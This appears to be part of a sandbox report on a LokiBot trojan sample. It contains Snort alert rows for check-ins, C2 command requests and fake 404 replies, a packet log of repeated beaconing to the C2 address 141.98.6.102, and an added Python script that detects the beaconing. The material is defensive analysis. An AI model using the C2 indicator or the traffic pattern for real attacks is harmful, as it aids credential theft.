                                                                                                          192.168.2.7141.98.6.10249726802825766 11/29/22-16:52:31.339365TCP2825766ETPRO TROJAN LokiBot Checkin M24972680192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249718802021641 11/29/22-16:52:27.285136TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971880192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249732802825766 11/29/22-16:52:36.325135TCP2825766ETPRO TROJAN LokiBot Checkin M24973280192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249727802025381 11/29/22-16:52:31.817491TCP2025381ET TROJAN LokiBot Checkin4972780192.168.2.7141.98.6.102
                                                                                                          141.98.6.102192.168.2.780497282025483 11/29/22-16:52:32.293466TCP2025483ET TROJAN LokiBot Fake 404 Response8049728141.98.6.102192.168.2.7
                                                                                                          192.168.2.7141.98.6.10249729802021641 11/29/22-16:52:32.689634TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972980192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249730802021641 11/29/22-16:52:33.273429TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973080192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249724802021641 11/29/22-16:52:30.488585TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972480192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249731802024313 11/29/22-16:52:33.757391TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973180192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249722802024318 11/29/22-16:52:29.504056TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972280192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249725802021641 11/29/22-16:52:30.920170TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972580192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249728802024318 11/29/22-16:52:32.198993TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972880192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249719802024318 11/29/22-16:52:27.785438TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971980192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249732802025381 11/29/22-16:52:36.325135TCP2025381ET TROJAN LokiBot Checkin4973280192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249731802024318 11/29/22-16:52:33.757391TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973180192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249723802025381 11/29/22-16:52:30.023507TCP2025381ET TROJAN LokiBot Checkin4972380192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249722802024313 11/29/22-16:52:29.504056TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972280192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249719802024313 11/29/22-16:52:27.785438TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971980192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249716802021641 11/29/22-16:52:25.029133TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971680192.168.2.7141.98.6.102
                                                                                                          141.98.6.102192.168.2.780497312025483 11/29/22-16:52:33.852928TCP2025483ET TROJAN LokiBot Fake 404 Response8049731141.98.6.102192.168.2.7
                                                                                                          141.98.6.102192.168.2.780497302025483 11/29/22-16:52:33.400113TCP2025483ET TROJAN LokiBot Fake 404 Response8049730141.98.6.102192.168.2.7
                                                                                                          141.98.6.102192.168.2.780497322025483 11/29/22-16:52:36.428850TCP2025483ET TROJAN LokiBot Fake 404 Response8049732141.98.6.102192.168.2.7
                                                                                                          192.168.2.7141.98.6.10249728802024313 11/29/22-16:52:32.198993TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972880192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249724802825766 11/29/22-16:52:30.488585TCP2825766ETPRO TROJAN LokiBot Checkin M24972480192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249729802825766 11/29/22-16:52:32.689634TCP2825766ETPRO TROJAN LokiBot Checkin M24972980192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249727802024313 11/29/22-16:52:31.817491TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972780192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249723802825766 11/29/22-16:52:30.023507TCP2825766ETPRO TROJAN LokiBot Checkin M24972380192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249721802024313 11/29/22-16:52:28.704063TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972180192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249724802025381 11/29/22-16:52:30.488585TCP2025381ET TROJAN LokiBot Checkin4972480192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249721802024318 11/29/22-16:52:28.704063TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972180192.168.2.7141.98.6.102
                                                                                                          141.98.6.102192.168.2.780497272025483 11/29/22-16:52:31.911870TCP2025483ET TROJAN LokiBot Fake 404 Response8049727141.98.6.102192.168.2.7
                                                                                                          141.98.6.102192.168.2.780497292025483 11/29/22-16:52:32.805162TCP2025483ET TROJAN LokiBot Fake 404 Response8049729141.98.6.102192.168.2.7
                                                                                                          192.168.2.7141.98.6.10249727802024318 11/29/22-16:52:31.817491TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972780192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249729802025381 11/29/22-16:52:32.689634TCP2025381ET TROJAN LokiBot Checkin4972980192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249716802825766 11/29/22-16:52:25.029133TCP2825766ETPRO TROJAN LokiBot Checkin M24971680192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249719802825766 11/29/22-16:52:27.785438TCP2825766ETPRO TROJAN LokiBot Checkin M24971980192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249725802825766 11/29/22-16:52:30.920170TCP2825766ETPRO TROJAN LokiBot Checkin M24972580192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249717802021641 11/29/22-16:52:26.668343TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971780192.168.2.7141.98.6.102
                                                                                                          141.98.6.102192.168.2.780497222025483 11/29/22-16:52:29.613062TCP2025483ET TROJAN LokiBot Fake 404 Response8049722141.98.6.102192.168.2.7
                                                                                                          192.168.2.7141.98.6.10249726802024313 11/29/22-16:52:31.339365TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972680192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249722802825766 11/29/22-16:52:29.504056TCP2825766ETPRO TROJAN LokiBot Checkin M24972280192.168.2.7141.98.6.102
                                                                                                          141.98.6.102192.168.2.780497232025483 11/29/22-16:52:30.124555TCP2025483ET TROJAN LokiBot Fake 404 Response8049723141.98.6.102192.168.2.7
                                                                                                          141.98.6.102192.168.2.780497262025483 11/29/22-16:52:31.441372TCP2025483ET TROJAN LokiBot Fake 404 Response8049726141.98.6.102192.168.2.7
                                                                                                          192.168.2.7141.98.6.10249732802024313 11/29/22-16:52:36.325135TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973280192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249726802024318 11/29/22-16:52:31.339365TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972680192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249728802025381 11/29/22-16:52:32.198993TCP2025381ET TROJAN LokiBot Checkin4972880192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249723802021641 11/29/22-16:52:30.023507TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972380192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249732802024318 11/29/22-16:52:36.325135TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973280192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249720802021641 11/29/22-16:52:28.227779TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972080192.168.2.7141.98.6.102
                                                                                                          192.168.2.7141.98.6.10249718802024318 11/29/22-16:52:27.285136TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971880192.168.2.7141.98.6.102
                                                                                                          141.98.6.102192.168.2.780497192025483 11/29/22-16:52:27.888790TCP2025483ET TROJAN LokiBot Fake 404 Response8049719141.98.6.102192.168.2.7
Timestamp                 Protocol  SID      Message                                                 Source Port  Dest Port  Source IP    Dest IP
11/29/22-16:52:32.689634  TCP       2024318  ET TROJAN LokiBot Request for C2 Commands Detected M2   49729        80         192.168.2.7  141.98.6.102
11/29/22-16:52:33.757391  TCP       2825766  ETPRO TROJAN LokiBot Checkin M2                         49731        80         192.168.2.7  141.98.6.102
11/29/22-16:52:32.689634  TCP       2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1   49729        80         192.168.2.7  141.98.6.102
11/29/22-16:52:33.273429  TCP       2024318  ET TROJAN LokiBot Request for C2 Commands Detected M2   49730        80         192.168.2.7  141.98.6.102
11/29/22-16:52:33.273429  TCP       2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1   49730        80         192.168.2.7  141.98.6.102
11/29/22-16:52:28.704063  TCP       2025381  ET TROJAN LokiBot Checkin                               49721        80         192.168.2.7  141.98.6.102
11/29/22-16:52:30.488585  TCP       2024318  ET TROJAN LokiBot Request for C2 Commands Detected M2   49724        80         192.168.2.7  141.98.6.102
11/29/22-16:52:27.285136  TCP       2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1   49718        80         192.168.2.7  141.98.6.102
11/29/22-16:52:28.227779  TCP       2825766  ETPRO TROJAN LokiBot Checkin M2                         49720        80         192.168.2.7  141.98.6.102
11/29/22-16:52:30.488585  TCP       2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1   49724        80         192.168.2.7  141.98.6.102
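The Snort alerts above and the per-packet TCP log below describe the same thing from two angles: the sample opens a new HTTP connection to 141.98.6.102:80 roughly every half second, and the ET signatures fire on the check-in and command-request posts inside those connections. The script below is an added example, not part of the Joe Sandbox report, that parses rows in the cleaned column layout of both tables, treats the first client packet on each ephemeral port as a connection start, measures the gap between successive connections as a crude beacon test, and joins each connection to the Snort SIDs raised on it by client port. The embedded rows are a constructed subset copied from this report, and the thresholds in looks_like_beacon are assumptions chosen for the example, not values from the report.

```python
import re
import statistics
from datetime import datetime

# Constructed sample input: a subset of rows in the column layout of the report's
# TCP packet table (Timestamp, Source Port, Dest Port, Source IP, Dest IP).
# Server replies are included so the per-connection grouping is exercised.
TCP_ROWS = """
Nov 29, 2022 16:52:24.997996092 CET 49716 80 192.168.2.7 141.98.6.102
Nov 29, 2022 16:52:25.025604963 CET 80 49716 141.98.6.102 192.168.2.7
Nov 29, 2022 16:52:25.025755882 CET 49716 80 192.168.2.7 141.98.6.102
Nov 29, 2022 16:52:25.628839970 CET 49717 80 192.168.2.7 141.98.6.102
Nov 29, 2022 16:52:26.658721924 CET 80 49717 141.98.6.102 192.168.2.7
Nov 29, 2022 16:52:27.252202988 CET 49718 80 192.168.2.7 141.98.6.102
Nov 29, 2022 16:52:27.755188942 CET 49719 80 192.168.2.7 141.98.6.102
Nov 29, 2022 16:52:28.194387913 CET 49720 80 192.168.2.7 141.98.6.102
Nov 29, 2022 16:52:28.664561987 CET 49721 80 192.168.2.7 141.98.6.102
Nov 29, 2022 16:52:28.696398973 CET 80 49721 141.98.6.102 192.168.2.7
""".strip().splitlines()

# Constructed sample input in the layout of the report's Snort table
# (Timestamp, Protocol, SID, Message, Source Port, Dest Port, Source IP, Dest IP).
SNORT_ROWS = """
11/29/22-16:52:27.285136 TCP 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 49718 80 192.168.2.7 141.98.6.102
11/29/22-16:52:28.227779 TCP 2825766 ETPRO TROJAN LokiBot Checkin M2 49720 80 192.168.2.7 141.98.6.102
11/29/22-16:52:28.704063 TCP 2025381 ET TROJAN LokiBot Checkin 49721 80 192.168.2.7 141.98.6.102
""".strip().splitlines()

TCP_RE = re.compile(
    r"^(?P<ts>\w{3} \d{1,2}, \d{4} \d\d:\d\d:\d\d)\.(?P<frac>\d+) \w+ "
    r"(?P<sport>\d+) (?P<dport>\d+) (?P<sip>[\d.]+) (?P<dip>[\d.]+)$"
)
# The message column contains spaces, so it is matched lazily and the four
# fixed trailing columns anchor the end of the row.
SNORT_RE = re.compile(
    r"^(?P<ts>\S+) (?P<proto>\S+) (?P<sid>\d+) (?P<msg>.+?) "
    r"(?P<sport>\d+) (?P<dport>\d+) (?P<sip>[\d.]+) (?P<dip>[\d.]+)$"
)


def parse_tcp(rows):
    """Turn packet rows into dicts; the 9-digit fraction is cut to microseconds for datetime."""
    out = []
    for row in rows:
        m = TCP_RE.match(row.strip())
        if not m:
            continue  # skip header or malformed rows
        ts = datetime.strptime(f"{m['ts']}.{m['frac'][:6]}", "%b %d, %Y %H:%M:%S.%f")
        out.append({"ts": ts, "sport": int(m["sport"]), "dport": int(m["dport"]),
                    "sip": m["sip"], "dip": m["dip"]})
    return out


def parse_snort(rows):
    """Keep the fields needed to join an alert to a connection: SID, message, client port."""
    out = []
    for row in rows:
        m = SNORT_RE.match(row.strip())
        if m:
            out.append({"sid": int(m["sid"]), "msg": m["msg"], "sport": int(m["sport"])})
    return out


def session_starts(packets, client_ip, c2_port=80):
    """First client->C2 packet per ephemeral port, i.e. one timestamp per TCP connection."""
    starts = {}
    for p in sorted(packets, key=lambda p: p["ts"]):
        if p["sip"] == client_ip and p["dport"] == c2_port and p["sport"] not in starts:
            starts[p["sport"]] = p["ts"]
    return starts


def connection_intervals(starts):
    """Seconds between consecutive connection openings, in time order."""
    times = sorted(starts.values())
    return [(b - a).total_seconds() for a, b in zip(times, times[1:])]


def looks_like_beacon(intervals, max_interval=2.0, min_connections=5):
    """Crude beacon test (thresholds are assumptions): many connections with a small median gap."""
    if not intervals or len(intervals) + 1 < min_connections:
        return False
    return statistics.median(intervals) < max_interval


def correlate(starts, alerts):
    """Map each connection (by client port) to the Snort SIDs raised on it."""
    by_port = {port: [] for port in starts}
    for a in alerts:
        if a["sport"] in by_port:
            by_port[a["sport"]].append(a["sid"])
    return by_port


if __name__ == "__main__":
    packets = parse_tcp(TCP_ROWS)
    starts = session_starts(packets, "192.168.2.7")
    gaps = connection_intervals(starts)
    print(f"{len(starts)} connections, median gap {statistics.median(gaps):.3f}s, "
          f"beacon={looks_like_beacon(gaps)}")
    for port, sids in correlate(starts, parse_snort(SNORT_ROWS)).items():
        print(port, sids or "no alert")
```

Connections without an alert are the useful part of the join: in this run only some of the check-in posts trip a signature, so the connection cadence is the more robust indicator when writing a detection for hosts that talk to the same C2.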
Timestamp                            Source Port  Dest Port  Source IP      Dest IP
Nov 29, 2022 16:52:24.997996092 CET  49716        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:25.025604963 CET  80           49716      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:25.025755882 CET  49716        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:25.029133081 CET  49716        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:25.056865931 CET  80           49716      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:25.057019949 CET  49716        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:25.084474087 CET  80           49716      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:25.134174109 CET  80           49716      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:25.134202957 CET  80           49716      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:25.134368896 CET  49716        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:25.134368896 CET  49716        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:25.483601093 CET  49716        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:25.510782003 CET  80           49716      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:25.628839970 CET  49717        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:26.658721924 CET  80           49717      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:26.658849001 CET  49717        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:26.668343067 CET  49717        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:26.696173906 CET  80           49717      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:26.698062897 CET  49717        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:26.725455999 CET  80           49717      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:26.780868053 CET  80           49717      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:26.782255888 CET  49717        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:26.787746906 CET  80           49717      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:26.791439056 CET  49717        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:26.811738968 CET  80           49717      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:27.252202988 CET  49718        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:27.279365063 CET  80           49718      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:27.279613972 CET  49718        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:27.285135984 CET  49718        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:27.313250065 CET  80           49718      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:27.313807011 CET  49718        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:27.340986967 CET  80           49718      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:27.393636942 CET  80           49718      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:27.393665075 CET  80           49718      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:27.394037962 CET  49718        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:27.394037962 CET  49718        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:27.421232939 CET  80           49718      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:27.755188942 CET  49719        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:27.782188892 CET  80           49719      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:27.782548904 CET  49719        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:27.785438061 CET  49719        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:27.812939882 CET  80           49719      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:27.813057899 CET  49719        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:27.840610981 CET  80           49719      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:27.888789892 CET  80           49719      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:27.888820887 CET  80           49719      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:27.888894081 CET  49719        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:27.889062881 CET  49719        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:27.916518927 CET  80           49719      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:28.194387913 CET  49720        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:28.224909067 CET  80           49720      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:28.224987030 CET  49720        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:28.227778912 CET  49720        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:28.258918047 CET  80           49720      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:28.259017944 CET  49720        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:28.287642002 CET  80           49720      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:28.346106052 CET  80           49720      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:28.346132994 CET  80           49720      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:28.346256971 CET  49720        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:28.346374989 CET  49720        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:28.374067068 CET  80           49720      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:28.664561987 CET  49721        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:28.696398973 CET  80           49721      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:28.697771072 CET  49721        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:28.704062939 CET  49721        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:28.731311083 CET  80           49721      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:28.731426001 CET  49721        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:28.758908033 CET  80           49721      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:28.798693895 CET  80           49721      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:28.798743010 CET  80           49721      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:28.798816919 CET  49721        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:28.798846960 CET  49721        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:28.825839996 CET  80           49721      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:29.469907999 CET  49722        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:29.496885061 CET  80           49722      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:29.497585058 CET  49722        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:29.504055977 CET  49722        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:29.531132936 CET  80           49722      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:29.535098076 CET  49722        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:29.563505888 CET  80           49722      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:29.613061905 CET  80           49722      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:29.613097906 CET  80           49722      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:29.613223076 CET  49722        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:29.613276958 CET  49722        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:29.640557051 CET  80           49722      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:29.990570068 CET  49723        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:30.019546986 CET  80           49723      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:30.019854069 CET  49723        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:30.023507118 CET  49723        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:30.051748991 CET  80           49723      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:30.051918030 CET  49723        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:30.080476999 CET  80           49723      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:30.124555111 CET  80           49723      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:30.124568939 CET  80           49723      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:30.124695063 CET  49723        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:30.124789000 CET  49723        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:30.153004885 CET  80           49723      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:30.451586008 CET  49724        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:30.484905958 CET  80           49724      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:30.485016108 CET  49724        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:30.488584995 CET  49724        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:30.515909910 CET  80           49724      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:30.515988111 CET  49724        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:30.542931080 CET  80           49724      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:30.593492031 CET  80           49724      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:30.593591928 CET  80           49724      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:30.593751907 CET  49724        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:30.593856096 CET  49724        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:30.622663975 CET  80           49724      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:30.885688066 CET  49725        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:30.914381981 CET  80           49725      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:30.914582968 CET  49725        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:30.920170069 CET  49725        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:30.948014975 CET  80           49725      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:30.948132038 CET  49725        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:30.975564957 CET  80           49725      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:31.018574953 CET  80           49725      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:31.018611908 CET  80           49725      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:31.018749952 CET  49725        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:31.018749952 CET  49725        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:31.047193050 CET  80           49725      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:31.308342934 CET  49726        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:31.336071014 CET  80           49726      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:31.336169958 CET  49726        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:31.339365005 CET  49726        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:31.367180109 CET  80           49726      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:31.367263079 CET  49726        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:31.395694017 CET  80           49726      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:31.441371918 CET  80           49726      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:31.441494942 CET  80           49726      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:31.441533089 CET  49726        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:31.441575050 CET  49726        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:31.469362020 CET  80           49726      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:31.785912991 CET  49727        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:31.814533949 CET  80           49727      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:31.814624071 CET  49727        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:31.817491055 CET  49727        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:31.844553947 CET  80           49727      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:31.844643116 CET  49727        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:31.871819019 CET  80           49727      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:31.911870003 CET  80           49727      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:31.912014008 CET  49727        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:31.912429094 CET  80           49727      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:31.912482023 CET  49727        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:31.939279079 CET  80           49727      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:32.167432070 CET  49728        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:32.195842028 CET  80           49728      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:32.195971966 CET  49728        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:32.198992968 CET  49728        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:32.226727962 CET  80           49728      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:32.226808071 CET  49728        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:32.254096031 CET  80           49728      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:32.293466091 CET  80           49728      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:32.293530941 CET  80           49728      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:32.293699980 CET  49728        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:32.294080019 CET  49728        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:32.321054935 CET  80           49728      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:32.657540083 CET  49729        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:32.685611963 CET  80           49729      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:32.686671019 CET  49729        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:32.689634085 CET  49729        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:32.718206882 CET  80           49729      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:32.718297958 CET  49729        80         192.168.2.7    141.98.6.102
Nov 29, 2022 16:52:32.746185064 CET  80           49729      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:32.805161953 CET  80           49729      141.98.6.102   192.168.2.7
Nov 29, 2022 16:52:32.805227041 CET  80           49729      141.98.6.102   192.168.2.7
